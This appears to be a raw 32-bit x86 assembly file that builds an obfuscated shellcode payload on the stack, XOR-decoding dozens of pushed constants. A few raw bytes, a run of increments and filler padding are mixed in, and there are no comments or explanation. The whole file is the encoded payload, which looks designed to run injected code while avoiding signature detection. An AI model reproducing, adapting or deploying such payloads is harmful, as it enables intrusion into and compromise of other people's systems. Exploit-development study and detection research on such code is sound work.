[BITS 32]
push 0x01010103
pop eax
xor  eax, 0x579387a5
push eax
push 0x01010104
pop eax
xor  eax, 0x8aeb928f
push eax
push 0x01010101
pop eax
xor  eax, 0x8ff8f1fe
push eax
push 0x01020104
pop eax
xor  eax, 0x62a2349a
push eax
push 0x03043201
pop eax
xor  eax, 0x8108af06
push eax
push 0x01310101
pop eax
xor  eax, 0x7dfe09e8
push eax
push 0x08010101
pop eax
xor  eax, 0xd2638231
push eax
push 0x01010601
pop eax
xor  eax, 0xe2ad0806
push eax
push 0x01010201
pop eax
xor  eax, 0x7d6ba6e9
push eax
push 0x08010604
pop eax
xor  eax, 0x9f639ff5
push eax
push 0x01010101
pop eax
xor  eax, 0x8e5da333
push eax
push 0x02030101
pop eax
xor  eax, 0x089a4b55
push eax
push 0x01010501
pop eax
xor  eax, 0xab8090af
push eax
push 0x03010107
pop eax
xor  eax, 0x9958839f
push eax
push 0x04010107
pop eax
xor  eax, 0x905d959f
push eax
push 0x03010105
pop eax
xor  eax, 0x995d849f
push eax
push 0x01020104
pop eax
xor  eax, 0x92087292
push eax
push 0x01010102
pop eax
xor  eax, 0xfeea39a5
push eax
push 0x01010933
pop eax
xor  eax, 0x9f37f79d
push eax
push 0x01010101
pop eax
xor  eax, 0x456d4931
push eax
push 0x03010102
pop eax
xor  eax, 0x9952fea7
push eax
push 0x01020206
pop eax
db 0x89
db 0x06
inc ebx
inc ebx
inc ebx
inc ebx
inc ebx
inc ebx
xor  eax, 0xe739859f
push eax
push 0x02010103
pop eax
xor  eax, 0x998af3a5
push eax
push 0x876799a7
push 0x01010101
pop eax
xor  eax, 0x57938371
push eax
push 0x01010102
pop eax
xor  eax, 0x37969a3c
push eax
push 0x940296d2
push 0x32010101
pop eax
xor  eax, 0xab7fe756
push eax
push 0x01010203
pop eax
xor  eax, 0x5793999d
push eax
push 0x41310106
pop eax
xor  eax, 0x679b9a9f
push eax
push 0x03310301
pop eax
xor  eax, 0x99da9a35
push eax
push 0x02010103
pop eax
xor  eax, 0x08579da5
push eax
push 0x02010101
pop eax
xor  eax, 0x9f633169
push eax
push 0x02030101
pop eax
xor  eax, 0xf5909a99
push eax
push 0x01050104
pop eax
xor  eax, 0x8af7e0f5
push eax
push 0x01030101
pop eax
xor  eax, 0x6299af39
push eax
push 0x01010101
pop eax
xor  eax, 0x885b939f
push eax
push 0x04010101
pop eax
xor  eax, 0x805b849f
push eax
push 0x02030103
pop eax
xor  eax, 0xa59a4ba5
push eax
push 0x01090401
pop eax
xor  eax, 0x829ff7af
push eax
push 0x02010101
pop eax
xor  eax, 0xa5dce3a3
push eax
push 0x31020101
pop eax
xor  eax, 0xfd08e643
push eax
push 0x02030103
pop eax
xor  eax, 0x399a4b99
push eax
push 0x9d7d97a7
push 0x01010401
pop eax
xor  eax, 0x99e99fff
push eax
push 0x02010203
pop eax
xor  eax, 0x9463faa5
push eax
push 0x01010132
pop eax
xor  eax, 0xf8ec9aab
push eax
push 0x06010101
pop eax
xor  eax, 0x0885fe58
push eax
push 0x05010101
pop eax
xor  eax, 0x9ae98933
push eax
push 0x01010108
pop eax
xor  eax, 0x7d5a8c9f
push eax
push 0x83518c94
push 0x01010101
pop eax
xor  eax, 0xfeeaf303
push eax
push 0x01020101
pop eax
xor  eax, 0x9f9ff858
push eax
push 0x01020209
pop eax
xor  eax, 0x5109ae9f
push eax
push 0x01020201
pop eax
xor  eax, 0x0943af58
push eax
push 0x01050101
pop eax
xor  eax, 0x849ae6f6
push eax
push 0x04020101
pop eax
xor  eax, 0xe19f8d37
push eax
push 0x01030101
pop eax
xor  eax, 0xf6d2908a
push eax
push 0x01010109
pop eax
xor  eax, 0x7afbfad2
push eax
push 0x010131ec
pop eax
xor  eax, 0xf689acd2
push eax
push 0x010101ec
pop eax
xor  eax, 0x9f067bda
push eax
push 0x02010701
pop eax
xor  eax, 0xd2939f05
push eax
push 0x01020201
pop eax
xor  eax, 0x9f9f9f58
push eax
push 0x03010103
pop eax
xor  eax, 0x90315790
push eax
push 0x03020102
pop eax
xor  eax, 0x909f67a5
push eax
push 0x9ce43e9f
push 0x01020102
pop eax
xor  eax, 0xe4098133
push eax
push 0x01320201
pop eax
xor  eax, 0xa3f59658
push eax
push 0x02010204
pop eax
xor  eax, 0xab413c92
push eax
push 0x07020203
pop eax
xor  eax, 0x999f859f
push eax
push 0x01010102
pop eax
xor  eax, 0xe382e5a5
push eax
push 0x31010101
pop eax
xor  eax, 0xa88e75a2
push eax
push 0x03013201
pop eax
xor  eax, 0xaa0996fd
push eax
push 0x02030101
pop eax
xor  eax, 0xab9d4b83
push eax
push 0x03010101
pop eax
xor  eax, 0xfe41039a
push eax
push 0xae783e92
push 0x07020203
pop eax
xor  eax, 0x999faf9f
push eax
push 0x01010101
pop eax
xor  eax, 0x093b8458
push eax
push 0x01030701
pop eax
xor  eax, 0x91909f36
push eax
push 0x02010203
pop eax
xor  eax, 0x086bfaa5
push eax
push 0x31320203
pop eax
xor  eax, 0xfda7dcd2
push eax
push 0x93838189
push 0x31310202
pop eax
xor  eax, 0xfdfd08fa
push eax
push 0x03ec0102
pop eax
xor  eax, 0xa5da729f
push eax
push 0x01020901
pop eax
xor  eax, 0x5a94d275
push eax
push 0x05010501
pop eax
xor  eax, 0x9a8b9a58
push eax
push 0x516a4747
push 0x47474747
push 0x47474747
push 0x47474747
cwde
db 0x84
